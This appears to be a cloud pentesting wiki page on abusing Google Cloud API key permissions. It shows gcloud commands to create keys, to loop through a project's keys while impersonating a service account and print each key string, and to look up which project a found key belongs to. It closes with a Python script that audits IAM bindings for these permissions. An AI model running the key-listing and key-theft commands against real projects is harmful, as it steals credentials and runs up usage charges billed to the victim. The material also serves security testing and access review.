GCP - Apikeys Privesc


apikeys

The following permissions are useful to create and steal API keys. Note this from the docs: An API key is a simple encrypted string that identifies an application without any principal. They are useful for accessing public data anonymously, and are used to associate API requests with your project for quota and billing.

Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.

apikeys.keys.create

This permission allows creating an API key:

gcloud alpha services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
    "@type":"type.googleapis.com/google.api.apikeys.v2.Key",
    "createTime":"2022-01-26T12:23:06.281029Z",
    "etag":"W/\"HOhA[...]==\"",
    "keyString":"AIzaSy[...]oU",
    "name":"projects/5[...]6/locations/global/keys/f707[...]e8",
    "uid":"f707[...]e8",
    "updateTime":"2022-01-26T12:23:06.378442Z"
}

You can find a script to automate the creation, exploit and cleaning of a vuln environment here.

apikeys.keys.getKeyString , apikeys.keys.list

These permissions allow listing all the API keys and getting their key strings:

gcloud alpha services api-keys create
for  key  in  $(gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys list --uri); do
	gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys get-key-string "$key"
done

You can find a script to automate the creation, exploit and cleaning of a vuln environment here.

apikeys.keys.regenerate , apikeys.keys.list

These permissions will (potentially) allow you to list and regenerate all the API keys, obtaining the new key strings.
It's not possible to use this from gcloud, but you can probably use it via the API. Once it's supported, the exploitation will be similar to the previous one (I guess).

apikeys.keys.lookup

This is extremely useful for checking which GCP project an API key that you have found belongs to:

gcloud alpha services api-keys lookup AIzaSyD[...]uE8Y
name: projects/5[...]6/locations/global/keys/28d[...]e0e
parent: projects/5[...]6/locations/global

In this scenario it could also be interesting to run the tool https://github.com/ozguralp/gmapsapiscanner and check what you can access with the API key.
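To review who in a project actually holds the permissions covered above, the following added example (not part of the original page or of any HackTricks tooling) combines an IAM policy with role definitions and reports which members end up with each permission combination, including when the permissions are split across several roles. The sample data, project, role and member names are constructed; the input shapes are assumed to match the JSON output of `gcloud projects get-iam-policy` and `gcloud iam roles describe`.

```python
# Permission sets from this page, keyed by what each combination allows.
CAPABILITIES = {
    "create new keys": {"apikeys.keys.create"},
    "list keys and read their key strings": {"apikeys.keys.list", "apikeys.keys.getKeyString"},
    "list keys and regenerate them": {"apikeys.keys.list", "apikeys.keys.regenerate"},
    "map a found key to its project": {"apikeys.keys.lookup"},
}

# Constructed sample input; every name below is made up for illustration.
CI = "serviceAccount:ci@example-project.iam.gserviceaccount.com"
PREFIX = "projects/example-project/roles/"
SAMPLE_POLICY = {"bindings": [
    {"role": PREFIX + "keyLister", "members": [CI, "user:dev@example.com"]},
    {"role": PREFIX + "keyReader", "members": [CI]},
    {"role": PREFIX + "keyMaker", "members": ["user:dev@example.com"]},
    {"role": "roles/viewer", "members": ["group:staff@example.com"]},
]}
SAMPLE_ROLES = [
    {"name": PREFIX + "keyLister", "includedPermissions": ["apikeys.keys.list", "apikeys.keys.get"]},
    {"name": PREFIX + "keyReader", "includedPermissions": ["apikeys.keys.getKeyString"]},
    {"name": PREFIX + "keyMaker", "includedPermissions": ["apikeys.keys.create", "apikeys.keys.lookup"]},
]

def audit_apikeys_access(policy, roles):
    """Return ({member: [capabilities]}, [roles with no definition supplied])."""
    perms_by_role = {r["name"]: set(r.get("includedPermissions", [])) for r in roles}
    member_perms, unresolved = {}, set()
    for binding in policy.get("bindings", []):
        role = binding["role"]
        if role not in perms_by_role:
            unresolved.add(role)  # cannot judge this role without its permission list
            continue
        # Permissions accumulate across every role bound to the same member.
        for member in binding.get("members", []):
            member_perms.setdefault(member, set()).update(perms_by_role[role])
    findings = {}
    for member, perms in member_perms.items():
        caps = sorted(name for name, needed in CAPABILITIES.items() if needed <= perms)
        if caps:
            findings[member] = caps
    return findings, sorted(unresolved)

if __name__ == "__main__":
    findings, unresolved = audit_apikeys_access(SAMPLE_POLICY, SAMPLE_ROLES)
    for member, caps in sorted(findings.items()):
        print(f"{member}: {'; '.join(caps)}")
    for role in unresolved:
        print(f"role definition missing, describe it and re-run: {role}")
```

Conditional bindings are treated as unconditional grants here, which errs on the side of reporting more members.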
